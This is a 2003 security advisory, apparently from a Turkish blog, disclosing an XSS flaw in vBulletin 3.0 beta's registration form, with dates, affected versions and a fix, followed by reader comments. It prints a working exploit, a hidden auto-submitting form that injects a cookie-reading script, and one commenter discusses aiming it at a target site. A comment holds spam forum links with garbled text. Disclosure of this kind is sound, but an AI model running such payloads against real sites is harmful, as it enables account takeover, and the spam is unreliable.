VBulletin New Member XSS Vulnerability

Etiketler no_tag, 06.08.2003
------------------------------------------------------ VBulletin New Member XSS Vulnerability ------------------------------------------------------ Any kind of XSS attacks possibility. With this vuln. an attacker could access other users/admins accounts. Online URL : http://ferruh.mavituna.com/article.asp?256 ------------------------------------------------------ About VBulletin; ------------------------------------------------------ PHP Based Popular Forum Application Vendor & Demo; www.vbulletin.com ------------------------------------------------------ Description; ------------------------------------------------------ In new member page (register.php), If you skip a required field system redirect you same form and fill fields automaticly that you enter before for a better form. In standard fields Vbulletin successfully handle script injections. But in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc... So you can execute any JS with these fields. ------------------------------------------------------ Vulnerable; ------------------------------------------------------ vBulletin 3.0 Beta 2 <> Beta 7 ------------------------------------------------------ Non Vulnerable; ------------------------------------------------------ vBulletin 3.0 Gamma vBulletin 2.3.0 vBulletin 2.2.8 ... ------------------------------------------------------ Vendor Status and Patch; ------------------------------------------------------ 26.01.2004, Problem fixed. To update vB3 Gamma or later. ------------------------------------------------------ History ------------------------------------------------------ Discovered : 15.07.2003 Vendor Informed : 29.07.2003 Publihed : 06.08.2003 ------------------------------------------------------ Solution; ------------------------------------------------------ HTML Encoding like other inputs is OK. ------------------------------------------------------ Exploit Code; ------------------------------------------------------ [form action="http://[victim]/register.php?do=register" method="post" style="display:none"] [input type="hidden" name="s" value="" /] [input type="hidden" name="regtype" value="1" /] [input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /] [input type="hidden" name="url" value="index.php" /] [input type="hidden" name="do" value="addmember" /] [/form] [script] //Code that will be executed var xss = "\"][script]alert(document"+".cookie)[\/script]"; document.forms[0].field1.value=xss; document.forms[0].submit(); [/script] *Replace ([],<>) Ferruh Mavituna http://ferruh.mavituna.com Web Application Security Specialist
anahtar kelimeler : no_tag

duhheesty - 08.04.2008


http://www.holidays-market.com/Forum/viewtopic.php?p=235962#235962
http://www.kosmolingua.de/alpha/forum/viewtopic.php?p=180197#180197
http://koelsche-toen.de/phpBB/viewtopic.php?p=26422#26422
http://www.motorwebben.se/Forum/viewtopic.php?p=313880#313880
http://www.borgernesdagsorden.dk/forum/viewtopic.php?p=78528#78528 Result: ïèêòîêîä äåøèôgîâàí;óñïåõ (ñ ïågâîé ñògàíèöû);BB-êîä íå gàáîòàåò;
http://ottchildeco.com/bbs////////view.php?DB=Custom_Center&num=310571&page=&start=0Result:GET-%F2%E0%E9%EC%E0%F3%F2%EE%E21;%F3%F1%EF%E5%F5%28%F1%EF%E5%F0%E2%EE%E9%F1%F2%F0%E0%ED%E8%F6%FB%29;BB-%EA%EE%E4%ED%E5%F0%E0%E1%EE%F2%E0%E5%F2; Result: GET-òàéìàóòîâ 1;óñïåõ (ñ ïågâîé ñògàíèöû);BB-êîä íå gàáîòàåò;
http://margueriterobertson.com/bb/viewtopic.php?p=62173#62173
http://www.tylerread.com/phpbb/viewtopic.php?p=206761#206761
http://acecop.com/phorum/viewtopic.php?p=128446#128446
http://www.astautodialer.com/phpBB2/viewtopic.php?p=99370#99370
http://datingbangalore.org/forum/viewtopic.php?p=110798#110798
http://ychat.co.za/bulitin/viewtopic.php?p=195260#195260
http://www.holtrain.com/Forum/viewtopic.php?p=37800#37800
http://www.bfpfilms.com/bullboard/viewtopic.php?p=106495#106495
http://www.adressedusite.com/forum/viewtopic.php?p=109794#109794
http://forum.fkt.no/viewtopic.php?p=317489#317489

ErKan Cengiz - 14.07.2004

hea simdi anLadim bunu galiba boyle bu kodu metin editorunde duzenLiycez

[form action=&quot;http://[victim]/register.php?do=register&quot; method=&quot;post&quot; style=&quot;display:none&quot;]

victim yazan yere hedef site yazilacak

ye metin belgemiz web sayfasi olarak kaydedilecek galiba daha sonrada acilinca sitede acik varsa girilecek gibi birsey fakat tam emin deilim bi ara denerim... sen eli opulecek adamsin ferruh:) sende cevherler var bunLari bizede ogret

ErKan Cengiz - 14.07.2004

gene bisi anLamadim falla

- 06.02.2004

th.x alot man for anfo

:) - 19.12.2003

yaaa sunlari turkce yaz abi ya.

Yorum Yazın


Tüm yorumlar onaydan geçmektedir, bu işlem en uzun 30 dk. sürecektir. E-mail adresleri yeni yorumları bildirme harici hiç bir başka amaçla kullanılmamaktadır ve sitede gözükmemektedir.



Captcha Kodu